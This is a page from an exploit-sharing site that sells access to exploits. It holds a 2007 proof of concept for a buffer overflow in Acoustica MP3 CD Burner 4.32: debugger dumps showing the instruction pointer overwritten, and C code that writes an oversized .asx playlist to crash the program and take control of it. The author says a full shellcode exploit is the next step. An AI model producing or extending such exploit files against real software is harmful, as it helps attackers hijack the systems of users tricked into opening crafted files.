0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Acoustica MP3 CD Burner 4.32 Local Buffer Overflow PoC
====================================================== Acoustica MP3 CD Burner 4.32 Local Buffer Overflow PoC ====================================================== /* Credit's to n00b for finding this bug and poc.. Acoustica MP3 CD Burner 4.32 local buffer-overflow poc code. Date : May 31'st 2007 Tested:On win xp sp 2. Acoustica Is prone to a buffer-overflow when parasing a .asx playlist file If you can entice some one to open a specialy crafted .asx play list file it is possible to run shell-code.This issue occurs because the applications fail to properly check boundaries on user-supplied data before copying it to an insufficiently sized memory buffer.If we open it up in olly and pass the specially crafted .asx we will see at first we can control the eax registers also ecx gets overwritten if we pass exception the eip is over written . I will try and write a loacal exploit in a few day's. ...\\Debug-info//... //////////////////////////////////////////////////////////////////////////////// /1.exception /(63c.3d8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=00127273 ecx=41414141 edx=7fffffff esi=7ffffffe edi=00000800 eip=003392f5 esp=00125f2c ebp=00126184 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 UpdateAllMasterChunks+0x4155: cmp byte ptr [eax],0 ds:0023:41414141=?? //////////////////////////////////////////////////////////////////////////////// //Eax and ecx are over-wrote with our user suplied data. //////////////////////////////////////////////////////////////////////////////// /2.exception /(63c.3d8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 eip=41414141 esp=00125b5c ebp=00125b7c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 41414141 ?? ??? //////////////////////////////////////////////////////////////////////////////// /As we can see after passing execution to the program we can control the eip. /we have 4bytes to write to any-where we like. ***to be continued** //////////////////////////////////////////////////////////////////////////////// Also 1 more thing .m3u file's are also exploitable but this is a different poc As .m3u file's we dont control the eip but we do control a few register's. */ #include <stdlib.h> #include <stdio.h> int main(int argc, char *argv[]) { FILE *asx; if(argc < 2) { system("cls"); printf("\n *************************************************"); printf("\n *************************************************"); printf("\n * Acoustica MP3 CD Burner 0day poc *"); printf("\n *************************************************"); printf("\n * Special thanks to Str0ke *"); printf("\n *************************************************"); printf("\n *Shout's ~ str0ke ~ c0ntex ~ marsu ~ v9@fakehalo*"); printf("\n *Date : May 31'st 2007 *"); printf("\n *************************************************"); printf("\n * Credit's to n00b for finding this bug and poc *"); printf("\n *************************************************"); printf("\n Usage:> Exploit.asx "); printf("\n *************************************************"); return 0; } if(!(asx = fopen(argv[1], "w"))) { printf("[+] Error"); return 0; } fputs("<ASX VERSION=\x22\x33\x2E\x30\x22\x3E\n", asx); fputs("<ENTRY>\n",asx); fputs("<TITLE>Acoustica MP3 CD Burner Bof</TITLE>\n",asx); fputs("<REF HREF=\x22",asx); { for (int i=0;i<512;i++) \ fputs("A", asx); for (int i=0;i<512;i++) \ fputs("A", asx); } fputs(".asf\x22\x2F\x3E\n", asx); fputs("</ENTRY>\n</ASX>\n", asx); fclose(asx); printf("File's successfully created"); printf("\nOpen with Acoustica MP3 CD Burner and eip will become 41414141"); printf("\nLocal exploit to be wrote in a few day's enjoy"); return 0; } # 0day.today [2024-12-25] #